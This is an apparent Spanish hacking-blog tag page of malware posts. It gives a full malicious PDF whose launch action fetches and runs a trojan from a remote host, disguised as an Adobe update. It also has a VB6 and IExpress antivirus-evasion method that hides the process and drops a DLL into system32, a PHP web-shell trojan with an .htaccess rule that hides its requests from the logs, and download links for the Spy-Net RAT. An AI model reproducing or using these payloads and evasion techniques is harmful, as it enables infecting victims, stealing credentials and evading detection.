Mostrando entradas con la etiqueta Troyanos y Virus. Mostrar todas las entradas
Mostrando entradas con la etiqueta Troyanos y Virus. Mostrar todas las entradas

26 jun. 2013

Filtrado el código fuente de #Carberp que se vendía en U$S40.000

 Carberp era un kit de crimeware privado comercializado mayormente en Rusia, pero miembros de la organización fueron detenidos en Rusia en el 2012 y tiempo después sale una versión comercial del troyano Carberp que normalmente se vende por U$S40.000 en mercado negro y en varios foros hackers.

Pues bueno, se ha filtrado la semana pasada el código fuente del malware Carberp  ya que algunos de los vendedores que pusieron a disposición el código lo hicieron dentro de un archivo protegido por una contraseña, contraseña que fue publicada recientemente.

14 mar. 2011

[Paper] Indetectando Malwares Cercando Firmas

ANTRAX a publicado en su blog un Tutorial de cómo Indetectabilizar Malwares sacando firmas de antivirus. Lo recomiendo 100% para todos aquellos que gustan del mundo del Malware.

21 nov. 2010

[Video] Cómo funciona SpyEye

SpyEye es el nuevo kit de creación de botnets que está recogiendo el exitoso testigo de Zeus. Se trata de un troyano bancario 2.0 que se vende en los entornos "underground" y que permite a un atacante crear de forma muy sencilla una botnet y recopilar datos sensibles de sus víctimas. En el vídeo se demuestra lo sencillo que sería para un atacante crear este troyano.

[Indetectando Malware] Método FakeProc

Bueno, hace mucho tiempo leyendo en indetectables.net me encontré con un tutorial para Indetectabilizar Malware, decidí subirlo porque nunca está demás... este es un tutorial en PDF donde explican un método para Indetectabilizar un Malware (Virus, Worm, Troyano, Joke, Bot, etc...) modificando el código fuente para confundir a los antivirus con buncles muy extensos. Sin duda anecdótico, pero útil:

18 jun. 2010

Ejecutar *.exe al abrir un PDF

Bueno.. me descargué un video donde explicaban el método y decidí escribir un pequeño tutorial de como hacer que al abrir un PDF se descargué y ejecute un *.exe.

Necesitamos:
  1. Nuestro *.exe (troyano, keylogger, bot, joke, etc...)
  2. Un FTP.
Dos simples cosas... Bueno, una vez definido el *.exe que vamos a usar, lo vamos a subir a un FTP, puede ser cualquiera que te deje subir archivos y descargarlos directamente con el formato ftp.miftp/server_troyano.exe también sirve algún uploader que deje la url en el mismo formato y que sea directo (sin captcha y sin retraso), en este caso no sirve ni megaupload, ni rapidshare, etc...

Si no encuentran buenos FTP, dense una vuelta por http://www.free-webhosts.com/webhosting-01.php.

Empecemos:

Bueno... ahora manos a la obra...

Inicio --> ejecutar --> notepad.exe

Pegan este código:
%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 8 0 R
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources 
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
 >>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
 /Size 9
 /Root 1 0 R
>>
startxref
751
%%EOF

Aquí lo único que tiene que modificar es:
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
En http://www.FTP-gratuito.com/server_troyano.exe ponen el link de su *.exe previamente subido a un FTP.

Si quieren también pueden modificar esto:
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
En Hacking[Blackploit]--> Blackploit.blogspot.com va el texto que aparecerá en el pdf cuando se abra.

Ya modificado todo, guardan el documento como exploit.pdf o como quieran, lo importante es que termine en *.pdf

Resultado:

Al abrir el pdf nos salta una ventana pidiendo que ejecutemos un *.exe.
Recomendanción: que su *.exe se llame Adobe-Update.exe.
Al poner abrir se ejecuta nuestro *.exe.

Para más detalles vean el video de donde saque la información: ExploitPdf.avi
Aquí el exploit: Exploit.pdf

Fuente: http://indetectables.net/

[+] Salu2
[+] ZioneR

1 jun. 2010

['Botnet' o red 'Zombie'] Qué es ??

Muchas veces nos enfrentamos con la necesidad de comunicar, a gente no especializada, de forma sencilla algunos conceptos. Como puede ser el caso de responder ¿que es una 'botnet'?

David Alameda de diario El Mundo.es preparó una breve y eficaz presentación gráfica que se puede ver aquí.




Fuente: http://blog.segu-info.com.ar/

28 may. 2010

Saltar las firmas Antivirus: Método D.A.F (Dependencias Anti-Firmas)

Bueno acá les traigo un manual que les explicara paso a paso como saltar las firmas que ponen ciertas compañías Antivirus en las dependencias de los ejecutables, el manual esta reescrito por mi y la fuente es de Indetectables.net en fin... espero que me entiendan y les sirva... saludos.

Vamos hacer un ejecutable portable con la ayuda de Iexpress y un par de aplicaciones nuestras que serán el malware a introducir y un pequeño programa de fácil creación desde cualquier lenguaje de programación, en este caso lo haremos con VB6 que también ha sido testeado con Windows 7.

lo primero que hacemos es crear ese EXE que hará todo nuestro trabajo, abriremos VB y seleccionamos “EXE estandar”.

Haremos doble clic sobre el formulario para que aparezca de tal manera que podamos introducir nuestro código.
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer
As String, ByVal nSize As Long) As Long
Private Sub Form_Initialize()
   Dim FFile As Long
   Dim sysDir As String
   Dim sLen As Long
   Dim Resource() As Byte
   sysDir = Space(260)
   sLen = GetSystemDirectory(sysDir, 260)
   sysDir = Left$(sysDir, sLen)
   On Error Resume Next
   Resource = LoadResData(101, "CUSTOM")
   FFile = FreeFile
   Open sysDir & "\aaaaaaaa.sys" For Binary Shared As #FFile
   Put #FFile, 1, Resource
   Close #FFile
End Sub
Private Sub form_load()
'Se esconde la aplicación
Me.Hide
'Desaparece del Taskmannager
App.TaskVisible = False
'Si ya esta en ejecución salimos, para no tener 2 corriendo a la vez
If App.PrevInstance = True Then: End
End
End Sub

Hacemos Click sobre el menú de complementos y se nos abrirá un desplegable para dirigirnos al “Administrador de complementos”.

Una nueva ventana se abrirá para seleccionar “VB 6 Resource Editor”, tildaremos la pestaña de Cargado y finalmente click en Aceptar.

Si miramos en la parte de arriba de nuestro VB6, veremos una mano blanca sobre lo más parecido a un cubo rubik, hacemos click en él.

Aparecerá la ventana donde podremos agregar de recurso nuestra dependencia al hacer click en el icono marcado en rojo.

En este caso haremos la prueba con la DLL de ejecución más importante que utiliza VB6, modificada anteriormente para que no ocupe tanto en nuestro Malware al final.

Al darle click y sobre Abrir aparecerá el siguiente recuadro en el que veremos a nuestra Dependencias.

Haremos click sobre en el dichoso icono guardado representando un disquete y elegiremos una ruta para guardar nuestro archivo “.RES”.

Una vez guardado automáticamente se añadirá a nuestro proyecto.

Hecha la parte más difícil tan solo nos quedará elegir el nombre con el que queremos que se copie nuestra DLL en sistema, iremos a la parte de código y donde aparece con el nombre elegido por mi para las pruebas de “aaaaaaaa.sys” modificaremos introduciendo el que queremos pero teniendo en cuenta que no podremos superar los caracteres de la dependencia real que después modificaremos desde un editor Hexadecimal.
Open sysDir & "\4n0nym.0us" For Binary Shared As #FFile
 Put #FFile, 1, Resource
 Close #FFile

Como se ve en la imagen modificado:

Ya terminamos nos quedará presionar en “Archivo > Generar Proyecto1.exe

Seleccionaremos la ruta y nombre donde guardar nuestro ejecutable y acabaremos con el Visual Basic

Nos dirigimos a nuestro malware, en este caso elegiremos un simple Notepad encriptado con un encriptador llamado Billar Crypter v2.0 Abrimos nuestro editor hexadecimal “Hex Workshops” e introducimos nuestro ejecutable encriptado y buscamos la dependencia a modificar.

Iremos a la herramienta de reemplazo en la que al encontrarnos con diferente número de caracteres tendremos que rellenar al “4n0nym.0us” (nuevo nombre de dependencia) con ceros a la derecha para que los ignore el código y todo funcione.

Al presionar sobre Aceptar saltará la siguiente ventana con la que modificaremos todas a la vez.

Con esto acabaremos de cargarnos el ejecutable si no le incorporamos nuestra dependencia de VB.

Si al ejecutar nuestro EXE sale este error todo funciona bien por ahora.

Iremos a “Inicio > Ejecutar > Iexpress” y empezaremos a juntar nuestros dos ejecutables para finalizar con el salteo de firmas en dependencias.

Sigan las instrucciones aunque el uso de esta herramienta es de lo más simple que hicieron nuestros amigos de Mocosoft.XD

Elegimos un nombre para el título de nuestro paquete de aplicaciones.

Seleccionamos la opción de “No prompt” y presionamos “Siguiente”.

Elegimos esta opción que aparece más abajo para que no muestre el display de licencia.

Presionando en el botón “Add”, buscaremos nuestros dos archivos.

En este paso seleccionamos el orden de ejecución de dichas aplicaciones, en primer lugar la “Dependencia.exe” para evitar el posible error de no encontrar la nueva “4n0nym.0us” y en el comando seleccionaremos nuestro ejecutable modificado.

Dependiendo del malware que se va a utilizar, configuren esta opción como prefieran si desean hacerlo todo de forma oculta o en mi caso queremos ver que el Notepad se ejecuta.

Seleccionamos esta opción para que no muestre ningún mensaje al finalizar las descompresiones.

Ocultamos las animaciones de extracción para que el usuario no vea nada extraño en la ejecución del archivo.

Seleccionamos la opción de no reiniciar la máquina para evitar sospechas.

En este caso elijan la que ustedes decidan pero a mi no me apetece guardar la directiva.

Presionamos siguiente y seguidamente aparecerá la ruta donde deseamos guardar nuestro ejecutable final.

Y finalizando presionamos en el botón marcado en rojo para acabar con todo el proceso.

Solo nos queda hacer la prueba y observar si ciertamente funciona, para eso vamos a la carpeta donde guardado nuestro ejecutable y por curiosidad abramos la ruta de “%Windir%/system32” para observar como automáticamente se agrega la dependencia al sistema y después se ejecuta nuestro “malware” en este caso un Notepad con lado oscuro XD.

Ejemplo sobre WXP SP2 32bits:

Ejemplo sobre W7 Ultimate 64bits:

Espero que les ayude en algo XD les mando saludos.

Descargar Método D.A.F. en PDF

Autor: 4nonym0u
Fuente: http://reactos.diosdelared.com/

16 may. 2010

Ocultar extensión *.exe en *.jpg o *.txt

Bueno. Hace tiempo que no posteaba nada en la sección "Troyanos y Virus" así que aquí va un video de como ocultar la extensión *.exe (un troyano, virus, keylogger) en cualquier extensión con un acceso directo:


PD: el método lleva bastante tiempo, pero sigue igualmente vigente.

Fuente: http://indetectables.net/

13 abr. 2010

Spy-Net v2.7


Nueva versión de esta herramienta realizada por SceneCoderZ.

Las nuevas características incluyen:
  • Añadido límite de conexión opcional.
  • Mayor estabilidad de la conexión. Spy-Net ahora es tan estable como SS-Rat.
  • Aumento de la velocidad en el administrador de archivos y unidades.
  • Inicio automático en la mayoría de características nw.
  • La recuperación de la contraseña ha mejorado.
Características y especificaciones:
  • Servidor de alrededor de 280 KB, dependiendo de si se selecciona el icono, rootkit, UPX comprimidos, etc.
  • Windows XP, Vista y 7 compatible.
  • DNS Updater (por ahora trabaja con No-IP. Dyndns en desarrollo actualizador atm)
  • Administrador de archivos con una carga completa de opciones como FTP upload, definir los atributos a los archivos, vista previa de imágenes, etc, etc, etc.
  • Lista de Windows.
  • Lista de Procesos.
  • Lista de dispositivos.
  • Lista de servicios.
  • Editor del Registro.
  • Programas instalados.
  • Lista de Puertos activos.
  • Escritorio remoto.
  • Captura de Webcam.
  • Captura de audio.
  • Herramienta para recuperar la contraseña (con descarga directa al cliente o FTP logs).
  • Contraseña Grabber.
  • Socks 4/5 proxy.
  • HTTP proxy.
  • Páginas webs abiertas.
  • Descarga y ejecución.
  • Enviar los archivos locales y ejecutar ocultos o normalmente.
  • Cliente Chat remoto.
  • Símbolo del sistema MS-DOS
  • Ejecutar cmd.
  • Grabber Portapapeles.
  • Búsqueda de archivos remotos y búsqueda de la contraseñas.
  • El acceso a la carpeta de descarga, capturas de pantalla de escritorio remoto y captura web desde el menú.
  • Tráfico cifrado entre el cliente y el servidor.
  • Algunas opciones adicionales (reinicio, bloqueo de botones y ....) cosas y todas las opciones relacionadas con el servidor (desinstalar, renombrar, etc etc etc);
  • Añadir una nueva opción para la inyección - espera que se conecte el navegador primero. Parece útil en algunos casos.
  • Rootkit en la etapa beta y se está elaborando. Se ocultará nombre del proceso y las claves de inicio que han SPY_NET_RAT como nombre. Probado en XP y de trabajo, se están desarrollando y probando en otros sistemas operativos.
  • Límite de Conexiones a selección.
  • Binder.
  • Posibilidad de elegir entre si el servidor se instala o no en el equipo remoto.
  
Descarga Spy-Net v2.7

[+] Salu2
[+] ZioneR

31 mar. 2010

Introducción a los troyanos en PHP

|=------------------------------------------------------------------------------=|
|=-----------------=[Introducción a los troyanos en php]=-----------------------=|
|=---------------------------=[ 28 enero 2010 ]=--------------------------------=|
|=------------------------=[  Por shad0w_crash  ]=------------------------------=|
|=-----------------------=[  Traducido por seth  ]=-----------------------------=|
|=------------------------------------------------------------------------------=|

Indice


1) Introducción
2) Suposiciones
3) Encriptación del código
4) Ocultamiento de la petición
5) Inyección
6) Medidas
7) Contacto


Adjunto 1: Troyano sencillo en php
Adjunto 2: .htaccess



1. Introducción
Este es mi segundo tutorial así que sentite libre de enviarme comentarios. El objetivo de este texto es proveer un poco de teoría sobre la creación de troyanos en lenguajes de scripting (en este caso php). No todos los ejemplos están completamente discutidos, así que hay lugar para el debate.
Todo el tema de escribir troyanos es un gran tabú, espero que escribiendo este documento pueda haber un poco de discusión. No quiero quiero que los sitios web sean infectados por troyanos, por eso escribí un montón en pseudo código y no hice una versión que funcione (por favor, no hagas una).



2. Suposiciones
Para lograr un troyano en php menos detectable, tenemos algunas dificultades:

* Cuando accedés a el, la petición aparece en los archivos de log.
* Cuando aparece un archivo adicional en el directorio web, puede a ser detectado por alguien.
* Cuando agregás código a un index, lo puede ver un programador.
* Cuando agregás código a un index, este va a ser sobrescrito en la próxima actualización.

Este texto no va a solucionar todos esos problemas. Para dar una mejor visión general hice algunas suposiciones:

* Cuando se actualiza una aplicación web y todos los archivos son reemplazados, probablemente se den cuenta de que algo le pasó al código y tu troyano no va a durar mucho tiempo. Para hacer mejores troyanos, no tenes que estar en este nivel del sistema operativo.
* Si el webmaster calcula los hashes de los archivos y los compara periódicamente, los métodos descritos no van a funcionar (se que se puede solucionar encontrando colisiones pero eso es muy complicado).
* El webmaster no puede crackear (T)DES, GOST, AES, etc.



3. Encriptación del código
Para crear un troyano en PHP dificil de detectar, necesitamos tener uno que funcione para usarlo de base (ver adjunto 1). El funcionamiento de este troyano menos detectable es encriptando el original. El código encriptado es guardado en una función (desde ahora la vamos a llamar f1) que:

1) Desencripta el archivo y lo pone en un .php con nombre aleatorio.
2) Envia la petición original a ese archivo temporal.
3) Elimina el archivo.

Con esto solucionamos algunos problemas. El programador no conoce y no puede conocer que hace la función. Tampoco lo van a hacer las herramientas que analizan el código, porque la unica forma es desencriptando la cadena, con la contraseña. También f1 puede ser insertado en index.php, indicando que la función solo debe ser ejecutada si una variable específica está activada (si no, todas las peticiones al archivo invocarian al troyano).

El mejor lugar para poner esta función son archivos como newsletter.php y login.php, ya que los archivos de librerias y el index son actualizados frecuentemente.



4. Ocultamiento de la petición
Un desafió que quedó, es evitar que todas las peticiones aparezcan en los logs. Voy a diferenciar dos peticiones, la primera es al archivo que contiene f1 y la segunda es la que f1 le hace al archivo temporal desencriptado.

Cuando ves una petición http normal hay mucha mas información que solo el GET o el POST. Pueden ser usadas un monton de cabeceras como Accept-Language, User-Agent, etc [1]. Usando getallheaders() podes verlas todas. Tenemos dos opciones:
* Extender nuestra petición con un nuevo valor (violando el RFC, pero con menos chances de que aparesca en los logs.
* Usar un valor elejido para algo en el RFC (y abusarlo, entonces hay mas chances de que un IDS lo detecte)

La función ahora puede obtener sus variables para autentificarse y ejecutar el proceso interno.
** ADVERTENCIA ** esto es seguridad por oscuridad. Es posible sniffear y repetir el ataque. Incluso cuando el servidor usa ssl, hay posibilidades de que el administrador haya puesto una herramienta que lo registre. Entonces, el podria repetir el ataque y darse cuenta de que hay un troyano.
Para evitar esto tenemos que enviar una variable extra al servidor un nuevo hash sha512 que reemplace al anterior. Así seria imposible repetir el ataque porque la contraseña funciona una sola vez.
La segunda petición es mas facil de esconder, para eso vamos a extender f1:
1) Crea un directorio con nombre aleatorio.
2) Escribe el .htaccess en ese directorio.
3) Desencripta el troyano en un archivo temporal con nombre aleatorio, en el directorio anterior.
4) Envia la petición original al archivo temporal.
5a) Elimina el archivo temporal
5b) Elimina el .htaccess
5c) elimina el directorio
De esta forma, no van a quear rastros en el log de acceso.



5. Inyección
Ahora que sabemos como esconder el troyano y como ocultarlo (lo mas posible), necesitamos un lugar para guardarlo. Al principio mencioné que puede estar en index.php o algun archivo similar, pero hay formas mas eficientes. Vamos a crear un script que haga lo siguiente:

1) Buscar una llamada a la función include()
2a) Tomar aleatoriamente dos archivos de los que se incluyen
2b) Si no se encuentran, se trabaja sobre el archivo actual
3) Buscar en el archivo variables de f1
4a) Si no coincide, insertar f1
4b) Si coincide, reemplazar variables en f1 y despues insertar la función



6. Medidas
Lo mejor que podes hacer para no ser infectado por un troyano web es mantener el software actualizado. Cuando tu sitio no es explotable, hay menos posibilidades de ser infectado. También, podes crear una lista con hashes de los archivos, guardarla en una computadora remota y compararlos periódicamente. De esta forma te vas a enterar de los cambios en los archivos.


7. ContactoSi tenes algo que añadir, simplemente copiá el texto y envialo al sitio de donde lo sacaste. Para contactarme: http://twitter.com/shad0w_crash (NdT: el habla en inglés, para contactarme a mi http://elrincondeseth.wordpress.com/ o "xd punto seth ar@ro@ba gmail p.u.n.t.o com")



Attach 1: Most easy PHP trojan.

Adjunto 1: Troyano sencillo en PHP.
error_reporting(0);

<?php
error_reporting(0); 
$action = $_GET['cmd'];
$pw = $_GET['pw']; 
$password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b";
/* Remove this line!, password= Hasdf4g */
if( hash('sha512',$pw) == $password)
{
 echo system($cmd); 
}
?>

Attach 2: .Htaccess.

Adjunto 2: .htaccess.

SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog
<Limit GET POST HEAD>
order deny,allow
deny from all
allow from 127.0.0.1 (or the remote ip of the server).
</Limit>

La primer regla evita los logs de acceso para el archivo.
La segunda solo permite peticiones por el servidor mismo.


[1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html

Fuente: http://www.exploit-db.com/

23 oct. 2009

Spy-Net [RAT] v2.6


Algunos cambios se realizó en esta nueva versión. Aquí:
  • Se ha corregido el error en la opción Buscar en el archivo de gestor de ficheros.
    Aumento de la velocidad en la lista de administrador de archivos y unidades de la lista.
  • Corregido un error en Regedit que causan algunos fallos de la parte del servidor.
  • Corregido un error en las opciones de puertos de cambio. Cuando el puerto seleccionado está en uso causar algunos accidentes en el cliente. Ahora que está bien.
  •  El cambio de escritorio y funciones de la cámara web. Ahora, cuando la ventana está abierta, al inicio captura automaticamente.
  • Mejor recuperación de las contraseñas.
  • Se quitó milisegundos de  Idle/Ping en la lista principal.
  • Se Añadió en la barra de progreso la búsqueda de contraseñas. Ahora, usted puede ver, cuando algún servidor busca una contraseña.
  • Ahora, el cliente puede recordar la última configuración en el escritorio y Webcam. El usuario no tiene que cambiar cada vez que entra.
  • Mayor transferencia de datos. Esta función de provoca un pequeño aumento en el tamaño del server.
  • Primera fecha de ejecución ha sido añadido de nuevo.
Descargar y ayuda en: http://hackhound.org/forum/

Descarga Directa: http://www.4shared.com/file/141956665/99a1fc2/Spt-Net_RAT_v26.html
Password: Spy-Net

Aquí un video tambien del Spy-Net [RAT] v2.6: http://www.4shared.com/file/142000732/10278fea/SpyNetVideo.html

Fuente: http://spynetrat.blogspot.com/